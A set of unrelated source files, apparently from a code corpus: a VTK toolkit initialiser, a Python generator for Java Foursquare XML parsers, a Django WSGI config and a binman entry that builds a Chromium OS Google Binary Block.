('vtk.graphics', 'VTK Graphics.'),
('vtk.rendering', 'VTK Rendering.'),
('vtk.hybrid', 'VTK Hybrid.'),
#('vtk.patented', 'VTK Patented.'),
('vtk', 'Other VTK symbols')]
# set the dynamic loading flags. If we don't do this, we get strange
# errors on 64 bit machines. To see this happen, comment this statement
# and then run the VTK->ITK connection test case.
oldflags = setDLFlags()
percentStep = 100.0 / len(vtkImportList)
currentPercent = 0.0
# do the imports
for module, message in vtkImportList:
currentPercent += percentStep
progressMethod(currentPercent, 'Initialising vtk_kit: %s' % (message,),
noTime=True)
exec('import %s' % (module,))
# restore previous dynamic loading flags
resetDLFlags(oldflags)
def setDLFlags():
# brought over from ITK Wrapping/CSwig/Python
# Python "help(sys.setdlopenflags)" states:
#
# setdlopenflags(...)
# setdlopenflags(n) -> None
#
# Set the flags that will be used for dlopen() calls. Among other
# things, this will enable a lazy resolving of symbols when
# importing a module, if called as sys.setdlopenflags(0) To share
# symbols across extension modules, call as
#
# sys.setdlopenflags(dl.RTLD_NOW|dl.RTLD_GLOBAL)
#
# GCC 3.x depends on proper merging of symbols for RTTI:
# http://gcc.gnu.org/faq.html#dso
#
try:
import dl
newflags = dl.RTLD_NOW|dl.RTLD_GLOBAL
except:
newflags = 0x102 # No dl module, so guess (see above).
try:
oldflags = sys.getdlopenflags()
sys.setdlopenflags(newflags)
except:
oldflags = None
return oldflags
def resetDLFlags(data):
# brought over from ITK Wrapping/CSwig/Python
# Restore the original dlopen flags.
try:
sys.setdlopenflags(data)
except:
pass
def init(module_manager, pre_import=True):
# first do the VTK pre-imports: this is here ONLY to keep the user happy
# it's not necessary for normal functioning
if pre_import:
preImportVTK(module_manager.setProgress)
# import the main module itself
# the global is so that users can also do:
# from module_kits import vtk_kit
# vtk_kit.vtk.vtkSomeFilter()
global vtk
import vtk
# and do the same for vtkdevide
global vtkdevide
import vtkdevide
# load up some generic functions into this namespace
# user can, after import of module_kits.vtk_kit, address these as
# module_kits.vtk_kit.blaat. In this case we don't need "global",
# as these are modules directly in this package.
import module_kits.vtk_kit.misc as misc
import module_kits.vtk_kit.mixins as mixins
import module_kits.vtk_kit.utils as utils
import module_kits.vtk_kit.constants as constants
import module_kits.vtk_kit.color_scales as color_scales
# setup the kit version
global VERSION
VERSION = '%s' % (vtk.vtkVersion.GetVTKVersion(),)
|
import datetime
import sys
import textwrap
import common
from xml.dom import pulldom
PARSER = """\
/**
* Copyright 2009 Joe LaPenna
*/
package com.joelapenna.foursquare.parsers;
import com.joelapenna.foursquare.Foursquare;
import com.joelapenna.foursquare.error.FoursquareError;
import com.joelapenna.foursquare.error.FoursquareParseException;
import com.joelapenna.foursquare.types.%(type_name)s;
import org.xmlpull.v1.XmlPullParser;
import org.xmlpull.v1.XmlPullParserException;
import java.io.IOException;
import java.util.logging.Level;
import java.util.logging.Logger;
/**
* Auto-generated: %(timestamp)s
*
* @author Joe LaPenna (joe@joelapenna.com)
* @param <T>
*/
public class %(type_name)sParser extends AbstractParser<%(type_name)s> {
private static final Logger LOG = Logger.getLogger(%(type_name)sParser.class.getCanonicalName());
private static final boolean DEBUG = Foursquare.PARSER_DEBUG;
@Override
public %(type_name)s parseInner(XmlPullParser parser) throws XmlPullParserException, IOException,
FoursquareError, FoursquareParseException {
parser.require(XmlPullParser.START_TAG, null, null);
%(type_name)s %(top_node_name)s = new %(type_name)s();
while (parser.nextTag() == XmlPullParser.START_TAG) {
String name = parser.getName();
%(stanzas)s
} else {
// Consume something we don't understand.
if (DEBUG) LOG.log(Level.FINE, "Found tag that we don't recognize: " + name);
skipSubTree(parser);
}
}
return %(top_node_name)s;
}
}"""
BOOLEAN_STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(Boolean.valueOf(parser.nextText()));
"""
GROUP_STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(new GroupParser(new %(sub_parser_camel_case)s()).parse(parser));
"""
COMPLEX_STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(new %(parser_name)s().parse(parser));
"""
STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(parser.nextText());
"""
def main():
type_name, top_node_name, attributes = common.WalkNodesForAttributes(
sys.argv[1])
GenerateClass(type_name, top_node_name, attributes)
def GenerateClass(type_name, top_node_name, attributes):
"""generate it.
type_name: the type of object the parser returns
top_node_name: the name of the object the parser returns.
per common.WalkNodsForAttributes
"""
stanzas = []
for name in sorted(attributes):
typ, children = attributes[name]
replacements = Replacements(top_node_name, name, typ, children)
if typ == common.BOOLEAN:
stanzas.append(BOOLEAN_STANZA % replacements)
elif typ == common.GROUP:
stanzas.append(GROUP_STANZA % replacements)
elif typ in common.COMPLEX:
stanzas.append(COMPLEX_STANZA % replacements)
else:
stanzas.append(STANZA % replacements)
if stanzas:
# pop off the extranious } else for the first conditional stanza.
stanzas[0] = stanzas[0].replace('} else ', '', 1)
replacements = Replacements(top_node_name, name, typ, [None])
replacements['stanzas'] = '\n'.join(stanzas).strip()
print PARSER % replacements
def Replacements(top_node_name, name, typ, children):
# CameCaseClassName
type_name = ''.join([word.capitalize() for word in top_node_name.split('_')])
# CamelCaseClassName
camel_name = ''.join([word.capitalize() for word in name.split('_')])
# camelCaseLocalName
attribute_name = camel_name.lower().capitalize()
# mFieldName
field_name = 'm' + camel_name
if children[0]:
sub_parser_camel_case = children[0] + 'Parser'
else:
sub_parser_camel_case = (camel_name[:-1] + 'Parser')
return {
'type_name': type_name,
'name': name,
'top_node_name': top_node_name,
'camel_name': camel_name,
'parser_name': typ + 'Parser',
'attribute_name': attribute_name,
'field_name': field_name,
'typ': typ,
'timestamp': datetime.datetime.now(),
'sub_parser_camel_case': sub_parser_camel_case,
'sub_type': children[0]
}
if __name__ == '__main__':
main()
|
"""
WSGI config for made_with_twd_project project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "made_with_twd_project.settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
import account
|
from collections import OrderedDict
from patman import command
from binman.entry import Entry, EntryArg
from dtoc import fdt_util
from patman import tools
gbb_flag_properties = {
'dev-screen-short-delay': 0x1,
'load-option-roms': 0x2,
'enable-alternate-os': 0x4,
'force-dev-switch-on': 0x8,
'force-dev-boot-usb': 0x10,
'disable-fw-rollback-check': 0x20,
'enter-triggers-tonorm': 0x40,
'force-dev-boot-legacy': 0x80,
'faft-key-override': 0x100,
'disable-ec-software-sync': 0x200,
'default-dev-boot-legacy': 0x400,
'disable-pd-software-sync': 0x800,
'disable-lid-shutdown': 0x1000,
'force-dev-boot-fastboot-full-cap': 0x2000,
'enable-serial': 0x4000,
'disable-dwmp': 0x8000,
}
class Entry_gbb(Entry):
"""An entry which contains a Chromium OS Google Binary Block
Properties / Entry arguments:
- hardware-id: Hardware ID to use for this build (a string)
- keydir: Directory containing the public keys to use
- bmpblk: Filename containing images used by recovery
Chromium OS uses a GBB to store various pieces of information, in particular
the root and recovery keys that are used to verify the boot process. Some
more details are here:
https://www.chromium.org/chromium-os/firmware-porting-guide/2-concepts
but note that the page dates from 2013 so is quite out of date. See
README.chromium for how to obtain the required keys and tools.
"""
def __init__(self, section, etype, node):
super().__init__(section, etype, node)
self.hardware_id, self.keydir, self.bmpblk = self.GetEntryArgsOrProps(
[EntryArg('hardware-id', str),
EntryArg('keydir', str),
EntryArg('bmpblk', str)])
# Read in the GBB flags from the config
self.gbb_flags = 0
flags_node = node.FindNode('flags')
if flags_node:
for flag, value in gbb_flag_properties.items():
if fdt_util.GetBool(flags_node, flag):
self.gbb_flags |= value
def ObtainContents(self):
gbb = 'gbb.bin'
fname = tools.GetOutputFilename(gbb)
if not self.size:
self.Raise('GBB must have a fixed size')
gbb_size = self.size
bmpfv_size = gbb_size - 0x2180
if bmpfv_size < 0:
self.Raise('GBB is too small (minimum 0x2180 bytes)')
sizes = [0x100, 0x1000, bmpfv_size, 0x1000]
sizes = ['%#x' % size for size in sizes]
keydir = tools.GetInputFilename(self.keydir)
gbb_set_command = [
'gbb_utility', '-s',
'--hwid=%s' % self.hardware_id,
'--rootkey=%s/root_key.vbpubk' % keydir,
'--recoverykey=%s/recovery_key.vbpubk' % keydir,
'--flags=%d' % self.gbb_flags,
'--bmpfv=%s' % tools.GetInputFilename(self.bmpblk),
fname]
tools.Run('futility', 'gbb_utility', '-c', ','.join(sizes), fname)
tools.Run('futility', *gbb_set_command)
self.SetContents(tools.ReadFile(fname))
return True
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.